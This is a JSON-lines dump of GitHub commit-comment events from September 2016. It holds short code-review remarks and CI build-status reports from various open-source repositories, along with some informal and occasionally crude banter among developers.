{"id":"4557275740","type":"CommitCommentEvent","actor":{"login":"kourge"},"repo":{"name":"falsandtru/TypeScript"},"payload":{"comment":{"id":19006062,"position":5,"line":23,"path":"lib/lib.es2015.collection.d.ts","commit_id":"63eec9c926ef31418e3fd583ee141452e5403cbe","created_at":"2016-09-13T18:04:49Z","updated_at":"2016-09-13T18:04:49Z","body":"This appears to remain unfixed in https://github.com/Microsoft/TypeScript/blob/master/src/lib/es2015.collection.d.ts#L7."}},"created_at":"2016-09-13T18:04:49Z"}
{"id":"4557276263","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19006063,"position":null,"line":null,"path":null,"commit_id":"641c3a9f93b4c0c91f930aa8f9eb0f9626298526","created_at":"2016-09-13T18:04:54Z","updated_at":"2016-09-13T18:04:54Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-13T18:04:54Z"}
{"id":"4557276325","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19006064,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T18:04:55Z","updated_at":"2016-09-13T18:04:55Z","body":"Obviously a project built with `new Primus({ transformer: 'uws' })` is built with both uws and Primus. Engine.io could just as well have said deepstream was built with engine.io. However, they are already swimming in hype so they have no need for this aggressive marketing like the small guys have."}},"created_at":"2016-09-13T18:04:55Z"}
{"id":"4557278462","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19006073,"position":150,"line":221,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T18:05:14Z","updated_at":"2016-09-13T18:05:14Z","body":"De finns en tag som heter <nav> använd den!"}},"created_at":"2016-09-13T18:05:14Z"}
{"id":"4557280476","type":"CommitCommentEvent","actor":{"login":"Roasbeef"},"repo":{"name":"lightningnetwork/lnd"},"payload":{"comment":{"id":19006080,"position":14,"line":490,"path":"lnwallet/wallet.go","commit_id":"49ce1040d410b018bee44679206f89ba60b859af","created_at":"2016-09-13T18:05:35Z","updated_at":"2016-09-13T18:05:35Z","body":"Hey, no the `commitFee` should be ignored for now as this is only a temporary measure. However, the `channelbalance` RPC shouldn't really touch the capacity field, I've explained this a bit more in   your original PR. "}},"created_at":"2016-09-13T18:05:35Z"}
{"id":"4557281858","type":"CommitCommentEvent","actor":{"login":"schmitch"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":19006085,"position":23,"line":0,"path":"framework/src/play-netty-server/src/main/scala/play/core/server/netty/NettyModelConversion.scala","commit_id":"a04eb013f3055e4bee2fc81869a1e271ce5d20e8","created_at":"2016-09-13T18:05:51Z","updated_at":"2016-09-13T18:05:51Z","body":"ah thanks, yeah I made them private"}},"created_at":"2016-09-13T18:05:51Z"}
{"id":"4557282095","type":"CommitCommentEvent","actor":{"login":"andersjohansson"},"repo":{"name":"minkkinen/org-annotate"},"payload":{"comment":{"id":19006086,"position":null,"line":null,"path":null,"commit_id":"ee895efa249ce09099c85c3d3aae383291777333","created_at":"2016-09-13T18:05:54Z","updated_at":"2016-09-13T18:05:54Z","body":"Another way to do the special markup in coming org 9.0 would be to use the `:activate-func` property of the link (see var `org-link-parameters`, and the function `org-activate-plain-links`). Maybe this would be \"cleaner\" in some way."}},"created_at":"2016-09-13T18:05:54Z"}
{"id":"4557282267","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19006088,"position":155,"line":225,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T18:05:56Z","updated_at":"2016-09-13T18:05:56Z","body":"Ingen CSS i HTML:en!"}},"created_at":"2016-09-13T18:05:56Z"}
{"id":"4557283632","type":"CommitCommentEvent","actor":{"login":"devoncarew"},"repo":{"name":"JetBrains/intellij-plugins"},"payload":{"comment":{"id":19006091,"position":14,"line":87,"path":"Dart/src/com/jetbrains/lang/dart/projectWizard/Stagehand.java","commit_id":"333396579d52dde4c7cf678b6f2bcc6e06961d60","created_at":"2016-09-13T18:06:11Z","updated_at":"2016-09-13T18:06:11Z","body":"@alexander-doroshko, can `SystemProperties.getUserName()` be null?"}},"created_at":"2016-09-13T18:06:11Z"}
{"id":"4557283685","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19006093,"position":null,"line":null,"path":null,"commit_id":"2204ed633b32eeed4aab68da74f33cbf7b81b8fe","created_at":"2016-09-13T18:06:11Z","updated_at":"2016-09-13T18:06:11Z","body":"Does it work?"}},"created_at":"2016-09-13T18:06:11Z"}
{"id":"4557284517","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19006095,"position":null,"line":null,"path":null,"commit_id":"2204ed633b32eeed4aab68da74f33cbf7b81b8fe","created_at":"2016-09-13T18:06:20Z","updated_at":"2016-09-13T18:06:20Z","body":"I'm in English, can't respond."}},"created_at":"2016-09-13T18:06:20Z"}
{"id":"4557285826","type":"CommitCommentEvent","actor":{"login":"aconanlai"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":19006097,"position":null,"line":null,"path":null,"commit_id":"ddc0d5ee736daa946d1a4c03d150d8e89baf9bd4","created_at":"2016-09-13T18:06:32Z","updated_at":"2016-09-13T18:06:32Z","body":"https://github.com/ded/script.js/\r\n\r\nsomething like this?"}},"created_at":"2016-09-13T18:06:32Z"}
{"id":"4557286074","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19006098,"position":175,"line":242,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T18:06:35Z","updated_at":"2016-09-13T18:06:35Z","body":"Usch!"}},"created_at":"2016-09-13T18:06:35Z"}
{"id":"4557287958","type":"CommitCommentEvent","actor":{"login":"leonklingele"},"repo":{"name":"lukas2511/dehydrated"},"payload":{"comment":{"id":19006104,"position":24,"line":97,"path":"dehydrated.sh","commit_id":"64e35463cbbfc35ad1bf8537b60602707be2daaf","created_at":"2016-09-13T18:06:54Z","updated_at":"2016-09-13T18:06:54Z","body":"Wow. Really? This will break __every__ installation?"}},"created_at":"2016-09-13T18:06:54Z"}
{"id":"4557290122","type":"CommitCommentEvent","actor":{"login":"andersjohansson"},"repo":{"name":"andersjohansson/org-annotate"},"payload":{"comment":{"id":19006110,"position":null,"line":null,"path":null,"commit_id":"ee895efa249ce09099c85c3d3aae383291777333","created_at":"2016-09-13T18:07:18Z","updated_at":"2016-09-13T18:07:18Z","body":"Another way to do the special markup in coming org 9.0 would be to use the `:activate-func` property of the link (see var `org-link-parameters`, and the function `org-activate-plain-links`). Maybe this would be \"cleaner\" in some way."}},"created_at":"2016-09-13T18:07:18Z"}
{"id":"4557290541","type":"CommitCommentEvent","actor":{"login":"idf"},"repo":{"name":"SnoozeZ/LeetCode"},"payload":{"comment":{"id":19006112,"position":null,"line":null,"path":null,"commit_id":"ac986cb0ccba053afbb21b7fe6ec8fa5f767da5e","created_at":"2016-09-13T18:07:23Z","updated_at":"2016-09-13T18:07:23Z","body":"Cong!"}},"created_at":"2016-09-13T18:07:23Z"}
{"id":"4557291640","type":"CommitCommentEvent","actor":{"login":"Rangoxl"},"repo":{"name":"Rangoxl/Hola"},"payload":{"comment":{"id":19006114,"position":null,"line":null,"path":null,"commit_id":"6abd4f602a987a7dbd0574a09878276e30606668","created_at":"2016-09-13T18:07:35Z","updated_at":"2016-09-13T18:07:35Z","body":"ajjajajaaja "}},"created_at":"2016-09-13T18:07:35Z"}
{"id":"4557291837","type":"CommitCommentEvent","actor":{"login":"SEAPUNK"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19006115,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T18:07:37Z","updated_at":"2016-09-13T18:07:37Z","body":"Just quick bikeshedding, I didn't mean anything by it."}},"created_at":"2016-09-13T18:07:37Z"}
{"id":"4557293840","type":"CommitCommentEvent","actor":{"login":"Rangoxl"},"repo":{"name":"Rangoxl/Hola"},"payload":{"comment":{"id":19006120,"position":2,"line":2,"path":"README.md","commit_id":"6abd4f602a987a7dbd0574a09878276e30606668","created_at":"2016-09-13T18:07:59Z","updated_at":"2016-09-13T18:07:59Z","body":"sdsdds"}},"created_at":"2016-09-13T18:07:59Z"}
{"id":"4557294348","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19006122,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T18:08:05Z","updated_at":"2016-09-13T18:08:05Z","body":"> I'd say that uws is a WebSocket engine, while Primus/engine.io/socket.io/etc are realtime frameworks\r\n\r\nCorrect so if I'm using engine.io I'm using the framework :)\r\n\r\n> However, they are already swimming in hype so they have no need for this aggressive marketing like the small guys have.\r\n\r\nFair enough, it was just an observation."}},"created_at":"2016-09-13T18:08:05Z"}
{"id":"4557296698","type":"CommitCommentEvent","actor":{"login":"knutsenm"},"repo":{"name":"CruGlobal/fe"},"payload":{"comment":{"id":19006128,"position":20,"line":23,"path":"app/views/fe/admin/panels/_common_fields.html.erb","commit_id":"d74cca22df605aa6140fb3be6ddea0a1a46d9a99","created_at":"2016-09-13T18:08:30Z","updated_at":"2016-09-13T18:08:30Z","body":"Did you mean \"common_boolean_fields\" here?"}},"created_at":"2016-09-13T18:08:30Z"}
{"id":"4557298051","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19006132,"position":178,"line":245,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T18:08:43Z","updated_at":"2016-09-13T18:08:43Z","body":"Bättre att ge den en `<p>` tagg istället som står för just paragraf."}},"created_at":"2016-09-13T18:08:43Z"}
{"id":"4557301122","type":"CommitCommentEvent","actor":{"login":"leonklingele"},"repo":{"name":"lukas2511/dehydrated"},"payload":{"comment":{"id":19006136,"position":3,"line":2,"path":"CHANGELOG","commit_id":"64e35463cbbfc35ad1bf8537b60602707be2daaf","created_at":"2016-09-13T18:09:16Z","updated_at":"2016-09-13T18:09:16Z","body":"Terrible decision imo."}},"created_at":"2016-09-13T18:09:16Z"}
{"id":"4557301329","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19006137,"position":181,"line":248,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T18:09:18Z","updated_at":"2016-09-13T18:09:18Z","body":"Ingen CSS!"}},"created_at":"2016-09-13T18:09:18Z"}
{"id":"4557304636","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19006151,"position":182,"line":249,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T18:09:53Z","updated_at":"2016-09-13T18:09:53Z","body":"`<p>`"}},"created_at":"2016-09-13T18:09:53Z"}
{"id":"4557305899","type":"CommitCommentEvent","actor":{"login":"schnittstabil"},"repo":{"name":"adbario/slim-secure-session-middleware"},"payload":{"comment":{"id":19006155,"position":8,"line":48,"path":"src/SessionMiddleware.php","commit_id":"834bbba630607a596c135faf2ab99cc7dbadde5f","created_at":"2016-09-13T18:10:08Z","updated_at":"2016-09-13T18:10:08Z","body":"`namespace` is not used to create `\\AdBar\\Session` instances in `__invoke` :confused:"}},"created_at":"2016-09-13T18:10:08Z"}
{"id":"4557306612","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19006156,"position":21,"line":55,"path":"youtube_dl/extractor/adobepass.py","commit_id":"6150502e4709b6b2ebc226c9c38fa346b9358699","created_at":"2016-09-13T18:10:14Z","updated_at":"2016-09-13T18:10:14Z","body":"it's done implicitly. the expiration time of the `authz_token`(hours) is shorter than the expiration of `authn_token`(months)."}},"created_at":"2016-09-13T18:10:14Z"}
{"id":"4557306664","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19006157,"position":184,"line":251,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T18:10:16Z","updated_at":"2016-09-13T18:10:16Z","body":"`<p>`"}},"created_at":"2016-09-13T18:10:16Z"}
{"id":"4557310134","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19006168,"position":188,"line":255,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T18:10:53Z","updated_at":"2016-09-13T18:10:53Z","body":"`<p>`"}},"created_at":"2016-09-13T18:10:53Z"}
{"id":"4557311558","type":"CommitCommentEvent","actor":{"login":"rtlanceroad"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":19006173,"position":null,"line":null,"path":null,"commit_id":"6214ff6a608560e6f6b64d7f1f4d016108bfc511","created_at":"2016-09-13T18:11:11Z","updated_at":"2016-09-13T18:11:11Z","body":"That doesn't look like the error caused by optional dependency. if not, which package caused this? If this is clear, we can add it as *hard* dependency to avoid this."}},"created_at":"2016-09-13T18:11:11Z"}
{"id":"4557312724","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19006178,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T18:11:23Z","updated_at":"2016-09-13T18:11:23Z","body":"Well I don't have Aspergers so I can tell each of your moods. Fun fact is that I'm actually kind of employed by deepstream now, I'm rewriting their entire messaging pipeline to C++/µWS. So it will very much be \"built by µWS\". Engine.io will be tossed out in a few days."}},"created_at":"2016-09-13T18:11:23Z"}
{"id":"4557313012","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19006179,"position":190,"line":257,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T18:11:26Z","updated_at":"2016-09-13T18:11:26Z","body":"`<p>`"}},"created_at":"2016-09-13T18:11:26Z"}
{"id":"4557321774","type":"CommitCommentEvent","actor":{"login":"paviad"},"repo":{"name":"paviad/GoSharp"},"payload":{"comment":{"id":19006199,"position":5,"line":426,"path":"Game.cs","commit_id":"268216c325952580b574f62e8f3645d886aa06d2","created_at":"2016-09-13T18:12:57Z","updated_at":"2016-09-13T18:12:57Z","body":"This is the crux of the fix"}},"created_at":"2016-09-13T18:12:57Z"}
{"id":"4557323593","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19006205,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T18:13:17Z","updated_at":"2016-09-13T18:13:17Z","body":"Awesome!"}},"created_at":"2016-09-13T18:13:17Z"}
{"id":"4557323654","type":"CommitCommentEvent","actor":{"login":"pslocum"},"repo":{"name":"project8/katydid"},"payload":{"comment":{"id":19006206,"position":null,"line":null,"path":null,"commit_id":"1088cf608ea4cc01c0d11d12b655ccf3edcf505a","created_at":"2016-09-13T18:13:18Z","updated_at":"2016-09-13T18:13:18Z","body":"Hi Noah, I was about to try to merge hotfix/2.5.3 into develop but I see that you have already merged hotfix/2.5.3b into feature/aafix.  Is there anything else I should be doing about this?  Thanks, Penny\r\n"}},"created_at":"2016-09-13T18:13:18Z"}
{"id":"4557324763","type":"CommitCommentEvent","actor":{"login":"aske"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19006208,"position":null,"line":null,"path":null,"commit_id":"bccd75094fd5108b3d834ad3a86e056eed3b0337","created_at":"2016-09-13T18:13:28Z","updated_at":"2016-09-13T18:13:28Z","body":"@vcunat Thanks! See #18567."}},"created_at":"2016-09-13T18:13:28Z"}
{"id":"4557325140","type":"CommitCommentEvent","actor":{"login":"hiddendoom45"},"repo":{"name":"hiddendoom45/Editable_Scouter"},"payload":{"comment":{"id":19006210,"position":1,"line":1,"path":"Stronghold.txt","commit_id":"3915d0fbe483e8f00c4e05fbb575ec5d971fd910","created_at":"2016-09-13T18:13:33Z","updated_at":"2016-09-13T18:13:33Z","body":"The messy settings used for FRC stronghold game"}},"created_at":"2016-09-13T18:13:33Z"}
{"id":"4557326421","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19006214,"position":null,"line":null,"path":null,"commit_id":"7a38204f56ea6320b4ec4f40c9d9560f1329db14","created_at":"2016-09-13T18:13:48Z","updated_at":"2016-09-13T18:13:48Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7a38204f56ea6320b4ec4f40c9d9560f1329db14-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7a38204f56ea6320b4ec4f40c9d9560f1329db14-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T18:13:48Z"}
{"id":"4557330282","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19006220,"position":null,"line":null,"path":null,"commit_id":"8c8f90c5689ada937dbb1846791727a705752d3d","created_at":"2016-09-13T18:14:30Z","updated_at":"2016-09-13T18:14:30Z","body":"ASIHPValidation (shenb) - Win64-Windows-7-VisualStudio-12: OK (2324 of 2332 tests passed, 24 test warnings)\n\n * 11 tests had: EIO diffs.\n * 7 tests had: ESO big diffs.\n * 8 tests had: Table big diffs.\n * 3 tests had: MTR big diffs.\n * 16 tests had: ESO small diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T18:14:30Z"}
{"id":"4557332369","type":"CommitCommentEvent","actor":{"login":"joachimmarder"},"repo":{"name":"Virtual-TreeView/Virtual-TreeView"},"payload":{"comment":{"id":19006224,"position":99,"line":99,"path":"Demos/Interfaces/modelviewform.pas","commit_id":"f45adc0c92677412d2c6c49330bafdfc35f848d7","created_at":"2016-09-13T18:14:53Z","updated_at":"2016-09-13T18:14:53Z","body":"Is the call to Clear() really needed?"}},"created_at":"2016-09-13T18:14:53Z"}
{"id":"4557335516","type":"CommitCommentEvent","actor":{"login":"jbednar"},"repo":{"name":"bokeh/bokeh"},"payload":{"comment":{"id":19006232,"position":null,"line":null,"path":null,"commit_id":"3e832e3e11347c7e91ff5f63ac899fb72da02b58","created_at":"2016-09-13T18:15:26Z","updated_at":"2016-09-13T18:15:26Z","body":"Looks good!"}},"created_at":"2016-09-13T18:15:26Z"}
{"id":"4557336967","type":"CommitCommentEvent","actor":{"login":"westsider"},"repo":{"name":"westsider/Meme-Me-V1-V2-for-Udacity"},"payload":{"comment":{"id":19006238,"position":6,"line":5,"path":"README.md","commit_id":"40efcc48ad421d06ac1915ef56a22765b6ed0b08","created_at":"2016-09-13T18:15:41Z","updated_at":"2016-09-13T18:15:41Z","body":"![sentmemes](https://cloud.githubusercontent.com/assets/19356639/18485833/5ed358a2-79a3-11e6-849c-dda52a7f1230.PNG)\r\n"}},"created_at":"2016-09-13T18:15:41Z"}
{"id":"4557337391","type":"CommitCommentEvent","actor":{"login":"aconanlai"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":19006239,"position":null,"line":null,"path":null,"commit_id":"ddc0d5ee736daa946d1a4c03d150d8e89baf9bd4","created_at":"2016-09-13T18:15:45Z","updated_at":"2016-09-13T18:15:45Z","body":"this file should actually be gitignored "}},"created_at":"2016-09-13T18:15:45Z"}
{"id":"4557338029","type":"CommitCommentEvent","actor":{"login":"XQ9-4R"},"repo":{"name":"XQ9-4R/Learning-Git"},"payload":{"comment":{"id":19006240,"position":1,"line":1,"path":"test.txt","commit_id":"7f5d103b9c44d1df76c01f99cc9c98c87fa7741e","created_at":"2016-09-13T18:15:51Z","updated_at":"2016-09-13T18:15:51Z","body":"Don't need this one."}},"created_at":"2016-09-13T18:15:51Z"}
{"id":"4557340998","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":19006247,"position":null,"line":null,"path":null,"commit_id":"9fef3e5d72fd2c1b58c2015690e548bb32baffe8","created_at":"2016-09-13T18:16:22Z","updated_at":"2016-09-13T18:16:22Z","body":"Did you want to commit .gitignore, .serve and  _config_dev.yml ?"}},"created_at":"2016-09-13T18:16:22Z"}
{"id":"4557341638","type":"CommitCommentEvent","actor":{"login":"lukas2511"},"repo":{"name":"lukas2511/dehydrated"},"payload":{"comment":{"id":19006249,"position":24,"line":97,"path":"dehydrated.sh","commit_id":"64e35463cbbfc35ad1bf8537b60602707be2daaf","created_at":"2016-09-13T18:16:28Z","updated_at":"2016-09-13T18:16:28Z","body":"@leonklingele I totally agree with that, but I didn't have a choice. See b95b15cad6dc7c736021b45fbcc4e7828836acea."}},"created_at":"2016-09-13T18:16:28Z"}
{"id":"4557344824","type":"CommitCommentEvent","actor":{"login":"rtlanceroad"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":19006252,"position":null,"line":null,"path":null,"commit_id":"7a58c9cc534372dd6e772310b510a995edbac19d","created_at":"2016-09-13T18:17:03Z","updated_at":"2016-09-13T18:17:03Z","body":"I did some work to get redshift gui work, since I am using LXDE and it's nice to have redshift-gtk on it. Those work including `add some python3 pkg as dependency` `fix pygobject-gtk3 from opt` and `fix the pkg itself`. But running redshift-gtk from command lines shows it *still* failed to start because it needs pkg geoclue2 which is another dependency of hell to implement. So feel free to revert it if you dont like this move, or you can keep it as it is now."}},"created_at":"2016-09-13T18:17:03Z"}
{"id":"4557346984","type":"CommitCommentEvent","actor":{"login":"socmag"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19006257,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T18:17:27Z","updated_at":"2016-09-13T18:17:27Z","body":"Oh shit I better not talk to you any more\n\nOn Sep 13, 2016 8:11 PM, \"Alex Hultman\" <notifications@github.com> wrote:\n\n> Well I don't have Aspergers so I can tell each of your moods. Fun fact is\n> that I'm actually kind of employed by deepstream now, I'm rewriting their\n> entire messaging pipeline to C++/µWS. So it will very much be \"built by\n> µWS\". Engine.io will be tossed out in a few days.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/uWebSockets/uWebSockets/commit/fe76c67911b0e3ff0a132849c45cbbc5b4949d63#commitcomment-19006178>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGQZ0k4uHlKp7rw9nFdB-mYLLNS50QY-ks5qpudNgaJpZM4J78hx>\n> .\n>\n"}},"created_at":"2016-09-13T18:17:27Z"}
{"id":"4557350044","type":"CommitCommentEvent","actor":{"login":"Benzhaomin"},"repo":{"name":"Benzhaomin/backupninja"},"payload":{"comment":{"id":19006263,"position":null,"line":null,"path":null,"commit_id":"000d2cf40af10bc0e77b0da4f60142a34b3f3351","created_at":"2016-09-13T18:18:02Z","updated_at":"2016-09-13T18:18:02Z","body":"@maethor, ok I added your copyright notice to the code waiting to be merged. Cheers"}},"created_at":"2016-09-13T18:18:02Z"}
{"id":"4557350075","type":"CommitCommentEvent","actor":{"login":"socmag"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19006262,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T18:18:02Z","updated_at":"2016-09-13T18:18:02Z","body":":-)\n\nOn Sep 13, 2016 8:11 PM, \"Alex Hultman\" <notifications@github.com> wrote:\n\n> Well I don't have Aspergers so I can tell each of your moods. Fun fact is\n> that I'm actually kind of employed by deepstream now, I'm rewriting their\n> entire messaging pipeline to C++/µWS. So it will very much be \"built by\n> µWS\". Engine.io will be tossed out in a few days.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/uWebSockets/uWebSockets/commit/fe76c67911b0e3ff0a132849c45cbbc5b4949d63#commitcomment-19006178>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGQZ0k4uHlKp7rw9nFdB-mYLLNS50QY-ks5qpudNgaJpZM4J78hx>\n> .\n>\n"}},"created_at":"2016-09-13T18:18:02Z"}
{"id":"4557350351","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19006265,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T18:18:06Z","updated_at":"2016-09-13T18:18:06Z","body":"Shit just got real, bitch! :smile_cat: "}},"created_at":"2016-09-13T18:18:06Z"}
{"id":"4557352289","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19006270,"position":null,"line":null,"path":null,"commit_id":"dae2a3a7fec0df526060f325075c9d965fabcfd1","created_at":"2016-09-13T18:18:27Z","updated_at":"2016-09-13T18:18:27Z","body":"os_2_0_develop_linux (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-dae2a3a7fec0df526060f325075c9d965fabcfd1-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-dae2a3a7fec0df526060f325075c9d965fabcfd1-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T18:18:27Z"}
{"id":"4557355672","type":"CommitCommentEvent","actor":{"login":"rolivia"},"repo":{"name":"plasma-umass/Fission"},"payload":{"comment":{"id":19006276,"position":27,"line":80,"path":"js/src/main/scala/NodejsCEK.scala","commit_id":"43d08430e59ec0376af166c889a09cedb02428c4","created_at":"2016-09-13T18:19:02Z","updated_at":"2016-09-13T18:19:02Z","body":"@arjunguha Would you take a look at this?  I put the eval stuff here instead of runRec so that runRec would still be tail recursive.  I just want to make sure there's not some obvious, better way of doing this that I'm missing."}},"created_at":"2016-09-13T18:19:02Z"}
{"id":"4557356567","type":"CommitCommentEvent","actor":{"login":"pslocum"},"repo":{"name":"project8/katydid"},"payload":{"comment":{"id":19006278,"position":null,"line":null,"path":null,"commit_id":"1088cf608ea4cc01c0d11d12b655ccf3edcf505a","created_at":"2016-09-13T18:19:12Z","updated_at":"2016-09-13T18:19:12Z","body":"In addition to the investigation into the analytic associate, there was also a fix in this branch to initiate the FFT better for single channel real time traces.  The investigation into the AA turned out to be unnecessary, but the fit to the FFT was important for processing egg files from Locust MC.  Let me know if I should do something."}},"created_at":"2016-09-13T18:19:12Z"}
